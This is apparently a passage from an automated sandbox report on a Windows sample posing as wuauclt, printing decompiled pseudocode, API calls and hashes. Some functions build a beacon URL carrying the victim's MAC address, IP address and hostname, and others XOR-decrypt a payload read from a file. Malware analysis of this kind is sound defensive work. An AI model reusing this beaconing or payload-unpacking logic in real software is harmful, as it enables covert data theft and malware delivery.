					 *0x27393c = _t29;
					 *0x273940 = E0025D3BF(_t23, _t29, 4);
					_t21 = E0025D2F4(0);
					if( *0x273940 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}











                                                0x0025a427
                                                0x0025a427
                                                0x0025a42f
                                                0x0025a432
                                                0x0025a43b
                                                0x0025a43d
                                                0x0025a43f
                                                0x00000000
                                                0x0025a43f
                                                0x0025a434
                                                0x0025a434
                                                0x0025a441
                                                0x0025a441
                                                0x0025a441
                                                0x0025a449
                                                0x0025a450
                                                0x0025a455
                                                0x0025a464
                                                0x0025a491
                                                0x0025a492
                                                0x0025a492
                                                0x0025a494
                                                0x0025a499
                                                0x0025a4a0
                                                0x0025a4a4
                                                0x0025a4a9
                                                0x0025a4b3
                                                0x0025a4bb
                                                0x0025a4c5
                                                0x0025a4c9
                                                0x0025a4cc
                                                0x0025a4d7
                                                0x0025a4d7
                                                0x0025a4ce
                                                0x0025a4ce
                                                0x0025a4d1
                                                0x00000000
                                                0x0025a4d3
                                                0x0025a4d3
                                                0x0025a4d5
                                                0x00000000
                                                0x00000000
                                                0x0025a4d5
                                                0x0025a4d1
                                                0x0025a4de
                                                0x0025a4e1
                                                0x0025a4e2
                                                0x0025a4e2
                                                0x0025a4eb
                                                0x0025a4ee
                                                0x0025a466
                                                0x0025a469
                                                0x0025a476
                                                0x0025a47b
                                                0x0025a48a
                                                0x00000000
                                                0x0025a48c
                                                0x0025a490
                                                0x0025a490
                                                0x0025a48a

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID: p$'
                                                • API String ID: 269201875-4283622799
                                                • Opcode ID: 63ac0e5c1a4d739fd370fa0959523141b9367eea63bf8aebb731ac832e121377
                                                • Instruction ID: 3560ffc3fa2b26529be3728a6d2c5233362c1a9ce96e947ebec3acd62bfcbafd
                                                • Opcode Fuzzy Hash: 63ac0e5c1a4d739fd370fa0959523141b9367eea63bf8aebb731ac832e121377
                                                • Instruction Fuzzy Hash: 1C118171A213119BE7309F68BC4EB167294B740731F140716EE58CB2E1E3F0C9AA5B86
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65networkCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 60%
                                                			E00256080(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				signed int _v16;
				char _v268;
				char _v276;
				char _v524;
				char _v532;
				char _v780;
				char _v788;
				void* __esi;
				signed int _t20;
				void* _t55;
				void* _t58;
				void* _t59;
				signed int _t60;

				_t62 = (_t60 & 0xfffffff8) - 0x308;
				_t20 =  *0x271004; // 0x80aab37c
				_v8 = _t20 ^ (_t60 & 0xfffffff8) - 0x00000308;
				_t55 = __edx;
				_t58 = __ecx;
				E002596C0(__edx,  &_v268, 0, 0x100);
				E002596C0(_t55,  &_v524, 0, 0x100);
				E002596C0(_t55,  &_v780, 0, 0x100);
				E00255F70( &_v268); // executed
				E00255E20(__ebx,  &_v524, _t55); // executed
				gethostname( &_v780, 0x100); // executed
				_push(_t58);
				_push(0x88888889 * (0x10624dd3 * GetTickCount() >> 0x20 >> 6) >> 0x20 >> 5);
				_push( &_v788);
				_push( &_v532);
				E00253D30(_t55, "/ipc.html?mac=%s&ip=%s&host=%s&tick=%dmin&c=%s",  &_v276);
				_pop(_t59);
				return E00257097(_v16 ^ _t62 + 0x40, _t59);
			}

















                                                0x00256086
                                                0x0025608c
                                                0x00256093
                                                0x002560a8
                                                0x002560ad
                                                0x002560af
                                                0x002560c6
                                                0x002560da
                                                0x002560e9
                                                0x002560f5
                                                0x00256104
                                                0x0025610a
                                                0x0025612b
                                                0x0025612c
                                                0x00256134
                                                0x00256143
                                                0x00256153
                                                0x0025615e

                                                APIs
                                                  • Part of subcall function 00255F70: WSAStartup.WS2_32(00000202,?), ref: 00255F96
                                                  • Part of subcall function 00255F70: GetAdaptersInfo.IPHLPAPI(?,?), ref: 00255FBC
                                                  • Part of subcall function 00255E20: WSAStartup.WS2_32(00000202,?), ref: 00255E48
                                                  • Part of subcall function 00255E20: gethostname.WS2_32(?,00000080), ref: 00255E8A
                                                  • Part of subcall function 00255E20: gethostbyname.WS2_32(?), ref: 00255E97
                                                  • Part of subcall function 00255E20: inet_ntoa.WS2_32(?), ref: 00255ED1
                                                • gethostname.WS2_32(?,00000100), ref: 00256104
                                                • GetTickCount.KERNEL32 ref: 0025610B
                                                Strings
                                                • /ipc.html?mac=%s&ip=%s&host=%s&tick=%dmin&c=%s, xrefs: 0025613D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Startupgethostname$AdaptersCountInfoTickgethostbynameinet_ntoa
                                                • String ID: /ipc.html?mac=%s&ip=%s&host=%s&tick=%dmin&c=%s
                                                • API String ID: 2444469772-17330609
                                                • Opcode ID: 20b4523f46d6c815e0445cec0da85656fee0f89a448fd12e72e9bde796f17c21
                                                • Instruction ID: 088ad97f1aa90b349f9e13c2019a1f15e65447ee2152bfbefe4b88343be0f53e
                                                • Opcode Fuzzy Hash: 20b4523f46d6c815e0445cec0da85656fee0f89a448fd12e72e9bde796f17c21
                                                • Instruction Fuzzy Hash: 2A1198725143446BC625EB14EC4BFDF77EC9B84700F40452AB989C71D1EEB0A658CBDA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256410 Relevance: 4.5, APIs: 3, Instructions: 25networkCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00256410(void** __ecx) {
				void* _t5;
				void* _t6;
				void* _t7;
				void** _t12;

				_t12 = __ecx;
				_t5 =  *__ecx;
				if(_t5 != 0) {
					InternetCloseHandle(_t5); // executed
				}
				_t6 = _t12[1];
				if(_t6 != 0) {
					InternetCloseHandle(_t6);
				}
				_t7 = _t12[2];
				if(_t7 != 0) {
					_t7 = InternetCloseHandle(_t7);
				}
				 *_t12 = 0;
				_t12[1] = 0;
				_t12[2] = 0;
				return _t7;
			}







                                                0x00256411
                                                0x0025641a
                                                0x0025641e
                                                0x00256421
                                                0x00256421
                                                0x00256423
                                                0x00256428
                                                0x0025642b
                                                0x0025642b
                                                0x0025642d
                                                0x00256432
                                                0x00256435
                                                0x00256435
                                                0x00256438
                                                0x0025643e
                                                0x00256445
                                                0x0025644d

                                                APIs
                                                • InternetCloseHandle.WININET(00000000), ref: 00256421
                                                • InternetCloseHandle.WININET(00000000), ref: 0025642B
                                                • InternetCloseHandle.WININET(00000000), ref: 00256435
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseHandleInternet
                                                • String ID:
                                                • API String ID: 1081599783-0
                                                • Opcode ID: 0e4c682f97ff1cdb316782061d71fcdb2cd21850f63f4b15db913f74e4b583fe
                                                • Instruction ID: 5b990eb4a6c8d44d37bbe03244a6c06df77e19c2da28e0b6479fd02b0ca86e09
                                                • Opcode Fuzzy Hash: 0e4c682f97ff1cdb316782061d71fcdb2cd21850f63f4b15db913f74e4b583fe
                                                • Instruction Fuzzy Hash: AEE04FB13103028BDB309F2AEC48B13F7ECAF90700F25881EE894D3250DBB4E884CA64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256610 Relevance: 3.9, APIs: 3, Instructions: 111memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 55%
                                                			E00256610(void* __ebx, CHAR* __ecx, void** __edx, void* __edi, long* _a4) {
				signed int _v12;
				char _v16;
				char _v48;
				intOrPtr _v52;
				char _v84;
				signed int _v88;
				char _v92;
				void* _v96;
				char _v100;
				void* __esi;
				signed int _t26;
				void* _t29;
				void* _t37;
				void** _t49;
				void* _t53;
				long _t61;
				void* _t63;
				intOrPtr _t65;
				long* _t68;
				signed int _t69;

				_t26 =  *0x271004; // 0x80aab37c
				_v12 = _t26 ^ _t69;
				_t68 = _a4;
				_t49 = __edx;
				_v100 = 0;
				_t61 =  &_v96;
				_v96 = 0;
				_t29 = E00256160(__ecx, _t61,  &_v100); // executed
				if(_t29 == 0) {
					L11:
					return E00257097(_v12 ^ _t69, _t68);
				} else {
					_t65 = _v100;
					if(_t65 >= 0x300000) {
						E002596C0(_t65,  &_v92, 0, 0x2c);
						_t53 = _v96;
						asm("movups xmm1, [edi+ecx-0x2c]");
						asm("movups [ebp-0x58], xmm1");
						asm("movups xmm0, [edi+ecx-0x1c]");
						asm("movd edx, xmm1");
						asm("movups [ebp-0x48], xmm0");
						asm("movq xmm0, [edi+ecx-0xc]");
						asm("movq [ebp-0x38], xmm0");
						_v52 =  *((intOrPtr*)(_t65 + _t53 - 4));
						if(_t61 - 0x300000 > 0x700000 || _t61 >= _t65) {
							_push(_t53);
							goto L10;
						} else {
							 *_t68 = _t61;
							_t37 = LocalAlloc(0x40, _t61); // executed
							 *_t49 = _t37;
							E00267820(_t37, _v96 + _t65 - _t61 - 0x2c,  *_t68);
							asm("xorps xmm0, xmm0");
							_v16 = 0;
							asm("movups [ebp-0x2c], xmm0");
							asm("movups [ebp-0x1c], xmm0");
							E00254560( *_t49,  *_t68, _t65 - _t61 - 0x2c,  &_v48);
							if(E0025D1BF(_t65 - _t61 - 0x2c, _t68,  &_v48,  &_v84) != 0) {
								goto L2;
							} else {
								_t63 = 0;
								if( *_t68 > 0) {
									do {
										 *( *_t49 + _t63) =  *( *_t49 + _t63) ^ _v88;
										_t63 = _t63 + 1;
									} while (_t63 <  *_t68);
								}
								LocalFree(_v96); // executed
								return E00257097(_v12 ^ _t69, _t68);
							}
						}
					} else {
						L2:
						_push(_v96);
						L10:
						LocalFree();
						goto L11;
					}
				}
			}























                                                0x00256616
                                                0x0025661d
                                                0x00256622
                                                0x00256629
                                                0x0025662b
                                                0x00256633
                                                0x00256636
                                                0x0025663d
                                                0x00256647
                                                0x00256744
                                                0x00256756
                                                0x0025664d
                                                0x0025664d
                                                0x00256656
                                                0x00256668
                                                0x0025666d
                                                0x00256673
                                                0x00256678
                                                0x0025667c
                                                0x00256681
                                                0x00256685
                                                0x00256689
                                                0x0025668f
                                                0x00256698
                                                0x002566a6
                                                0x0025673d
                                                0x00000000
                                                0x002566b4
                                                0x002566b7
                                                0x002566be
                                                0x002566c7
                                                0x002566cf
                                                0x002566de
                                                0x002566e1
                                                0x002566e5
                                                0x002566ea
                                                0x002566ee
                                                0x00256708
                                                0x00000000
                                                0x0025670e
                                                0x0025670e
                                                0x00256712
                                                0x00256714
                                                0x00256719
                                                0x0025671c
                                                0x0025671d
                                                0x00256714
                                                0x00256724
                                                0x0025673c
                                                0x0025673c
                                                0x00256708
                                                0x00256658
                                                0x00256658
                                                0x00256658
                                                0x0025673e
                                                0x0025673e
                                                0x00000000
                                                0x0025673e
                                                0x00256656

                                                APIs
                                                  • Part of subcall function 00256160: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025617F
                                                  • Part of subcall function 00256160: GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025619F
                                                  • Part of subcall function 00256160: LocalAlloc.KERNELBASE(00000040,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561AE
                                                  • Part of subcall function 00256160: CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561BE
                                                • LocalAlloc.KERNELBASE(00000040), ref: 002566BE
                                                • LocalFree.KERNELBASE(00000000), ref: 00256724
                                                • LocalFree.KERNEL32(00000000), ref: 0025673E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Local$AllocFileFree$CloseCreateHandleSize
                                                • String ID:
                                                • API String ID: 36350866-0
                                                • Opcode ID: e331e83b90636138098ab7d2ff6a7c39f12ac1a129b5a62b7e1e774f714e8597
                                                • Instruction ID: c705e33ce572543bdbbe195d86ec5c6bf158848cd31fab58bb6fd877ee156ca4
                                                • Opcode Fuzzy Hash: e331e83b90636138098ab7d2ff6a7c39f12ac1a129b5a62b7e1e774f714e8597
                                                • Instruction Fuzzy Hash: 8741D371E1024C9BCF00DFA4D885BEDF7B9EF98305F108229EC056B245EB3065A9CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025DD4A Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E0025DD4A() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed int _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x273b90 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x273940; // 0x0
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










                                                0x0025dd4f
                                                0x0025dd51
                                                0x0025dd55
                                                0x0025dd5e
                                                0x0025dd69
                                                0x0025dd79
                                                0x0025dd7d
                                                0x0025dd80
                                                0x0025dd92
                                                0x0025dd82
                                                0x0025dd85
                                                0x0025dd8e
                                                0x0025dd87
                                                0x0025dd87
                                                0x0025dd89
                                                0x0025dd85
                                                0x0025dd94
                                                0x0025dd9c
                                                0x0025dda1
                                                0x0025ddb0
                                                0x0025dda7
                                                0x0025dda8
                                                0x0025dda8
                                                0x0025ddb4
                                                0x0025ddd4
                                                0x0025ddd8
                                                0x0025dddf
                                                0x0025dde6
                                                0x0025dde8
                                                0x0025ddeb
                                                0x0025ddeb
                                                0x0025ddb6
                                                0x0025ddb6
                                                0x0025ddbb
                                                0x0025ddc1
                                                0x0025ddcc
                                                0x0025ddce
                                                0x0025ddce
                                                0x0025ddc3
                                                0x0025ddc3
                                                0x0025ddc3
                                                0x0025ddc1
                                                0x0025dd71
                                                0x0025dd71
                                                0x0025dd71
                                                0x0025ddf2
                                                0x0025ddf3
                                                0x0025ddff

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 0025DD96
                                                • GetFileType.KERNELBASE(00000000), ref: 0025DDA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: FileHandleType
                                                • String ID:
                                                • API String ID: 3000768030-0
                                                • Opcode ID: 3180e9163cec526e725ccffeba25a91e665d156f748656259fb18aa91e78cffd
                                                • Instruction ID: 977384c0c86725de34e99a35f24f21ca8d56210c1171e3c4470f04a3a3be1a72
                                                • Opcode Fuzzy Hash: 3180e9163cec526e725ccffeba25a91e665d156f748656259fb18aa91e78cffd
                                                • Instruction Fuzzy Hash: 8511B433126B5346D7304E3D8C8C722BEB4A756336B380719D9BAC61F1C774D8A9D609
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256CE1 Relevance: 3.0, APIs: 2, Instructions: 6registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00256CE1(void* __esi) {
				void* _t6;

				RegCloseKey(__esi); // executed
				return RegCloseKey( *(_t6 - 0x1c));
			}




                                                0x00256ce8
                                                0x00256cef

                                                APIs
                                                • RegCloseKey.ADVAPI32(80000002,00256CC7,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description), ref: 00256CE8
                                                • RegCloseKey.ADVAPI32(002593E0,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description), ref: 00256CED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 6d8a57cf1a000f316466e83a9e8bc2337011a3c48e393ba8ad282ad9bfb6c687
                                                • Instruction ID: 1fae779a9b166d53023d3b6028f45edeb1d653589baa8dc719c49f683981b345
                                                • Opcode Fuzzy Hash: 6d8a57cf1a000f316466e83a9e8bc2337011a3c48e393ba8ad282ad9bfb6c687
                                                • Instruction Fuzzy Hash: 36A01230C1403846CF101750FC0454E3E38AF00110301405290102307049601C51DEC0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00254670 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E00254670(intOrPtr* __ecx) {
				void* _t8;
				void* _t11;
				void* _t18;
				intOrPtr* _t19;

				_t19 = __ecx;
				_t15 =  *((intOrPtr*)( *__ecx + 0xc)) + 0x50;
				_t8 = LocalAlloc(0x40,  *((intOrPtr*)( *__ecx + 0xc)) + 0x50); // executed
				_t20 =  *_t19;
				_t18 = _t8;
				asm("movups xmm0, [esi]");
				_t2 = _t18 + 0x50; // 0x50
				asm("movups [edi], xmm0");
				asm("movups xmm0, [esi+0x10]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm0, [esi+0x20]");
				asm("movups [edi+0x20], xmm0");
				asm("movups xmm0, [esi+0x30]");
				asm("movups [edi+0x30], xmm0");
				asm("movups xmm0, [esi+0x40]");
				asm("movups [edi+0x40], xmm0");
				E00267820(_t2,  *((intOrPtr*)( *_t19 + 0x50)),  *((intOrPtr*)( *_t19 + 0xc)));
				_t11 = E002546E0(_t18, _t15,  *((intOrPtr*)(_t20 + 0x54)),  *((intOrPtr*)(_t20 + 0x38))); // executed
				LocalFree(_t18); // executed
				return _t11;
			}







                                                0x00254672
                                                0x0025467a
                                                0x00254680
                                                0x00254686
                                                0x00254688
                                                0x0025468a
                                                0x0025468d
                                                0x00254690
                                                0x00254693
                                                0x00254697
                                                0x0025469b
                                                0x0025469f
                                                0x002546a3
                                                0x002546a7
                                                0x002546ab
                                                0x002546af
                                                0x002546ba
                                                0x002546c7
                                                0x002546d2
                                                0x002546dd

                                                APIs
                                                • LocalAlloc.KERNELBASE(00000040,?,?,00000000,-00000050,00254983), ref: 00254680
                                                  • Part of subcall function 002546E0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 002546F5
                                                • LocalFree.KERNELBASE(00000000), ref: 002546D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Local$AcquireAllocContextCryptFree
                                                • String ID:
                                                • API String ID: 3426805970-0
                                                • Opcode ID: 1839465a256cd49cfba3b0dec0f0f60e743d6198aa0d980f290c96f44a43bb3e
                                                • Instruction ID: 46f87d6e77b0852ab34c8612286f7fb952c82c0189be3b85539b448d55f280e8
                                                • Opcode Fuzzy Hash: 1839465a256cd49cfba3b0dec0f0f60e743d6198aa0d980f290c96f44a43bb3e
                                                • Instruction Fuzzy Hash: 24018031D14B45ABD3114F38DD459A2F3B8FF6D208704A709EAC523912EB71B5E4C750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002558E0 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E002558E0(char* __ebx, char* __ecx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v276;
				char _v280;
				void* __esi;
				signed int _t10;
				void* _t14;
				void* _t16;
				void* _t40;
				signed int _t42;

				_t29 = __ebx;
				_t10 =  *0x271004; // 0x80aab37c
				_v8 = _t10 ^ _t42;
				_push(0x700);
				_t40 = __ecx;
				_v280 = 0x700;
				_t41 = E0025B87D(__ecx);
				_t14 = E00255A50(__ecx, _t12,  &_v280); // executed
				if(_t14 == 0 || _v280 != 0x380) {
					E0025B878(_t41);
					_t16 = E00255180(_t29, _t40, _t40); // executed
					if(_t16 != 0) {
						goto L6;
					} else {
						return E00257097(_v8 ^ _t42, _t41);
					}
				} else {
					E00267820(_t40, _t41, 0x380);
					E0025B878(_t41);
					E002596C0(_t40,  &_v276, 0, 0x104);
					GetSystemDirectoryA( &_v276, 0x104);
					if(E00254AE0(__ebx, _t40, _t40) != 4) {
						L6:
						return E00257097(_v8 ^ _t42, _t41);
					} else {
						return E00257097(_v8 ^ _t42, _t41);
					}
				}
			}












                                                0x002558e0
                                                0x002558e9
                                                0x002558f0
                                                0x002558f5
                                                0x002558fa
                                                0x002558fc
                                                0x0025590e
                                                0x00255919
                                                0x00255923
                                                0x00255932
                                                0x0025593c
                                                0x00255943
                                                0x00000000
                                                0x00255947
                                                0x00255954
                                                0x00255954
                                                0x00255955
                                                0x0025595c
                                                0x00255965
                                                0x0025597b
                                                0x0025598f
                                                0x0025599f
                                                0x002559b3
                                                0x002559c4
                                                0x002559a1
                                                0x002559b2
                                                0x002559b2
                                                0x0025599f

                                                APIs
                                                  • Part of subcall function 00255A50: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,00000000), ref: 00255A72
                                                • GetSystemDirectoryA.KERNEL32 ref: 0025598F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: DirectoryOpenSystem
                                                • String ID:
                                                • API String ID: 4120783374-0
                                                • Opcode ID: 2ca7c06a0b8f3a53dbef3ed4f3a9f687531d67726ee36e3a7db335ffab996f31
                                                • Instruction ID: 02c7abd29253fe9f24d03cfa046d33931cc74b437d1fd538ef3e5ccb2a284e69
                                                • Opcode Fuzzy Hash: 2ca7c06a0b8f3a53dbef3ed4f3a9f687531d67726ee36e3a7db335ffab996f31
                                                • Instruction Fuzzy Hash: F21108B2E1011CA7DF14EA247C17BFE33588F41326F0000A5FD0997281DE765E6C8AD6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00260827 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E00260827(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E0025D3BF(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E0025D7A8(_t28, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				E0025D2F4(0);
				return _t31;
			}













                                                0x0026082c
                                                0x0026082d
                                                0x00260834
                                                0x00260839
                                                0x0026083d
                                                0x00260841
                                                0x00260844
                                                0x0026084a
                                                0x0026084a
                                                0x00260850
                                                0x00260852
                                                0x00260855
                                                0x00260855
                                                0x00260858
                                                0x0026085a
                                                0x00260860
                                                0x00260864
                                                0x00260869
                                                0x0026086d
                                                0x0026086f
                                                0x00260872
                                                0x00260878
                                                0x0026087f
                                                0x00260883
                                                0x00260887
                                                0x0026088a
                                                0x0026088a
                                                0x0026088e
                                                0x00260891
                                                0x00260846
                                                0x00260846
                                                0x00260846
                                                0x00260893
                                                0x002608a0

                                                APIs
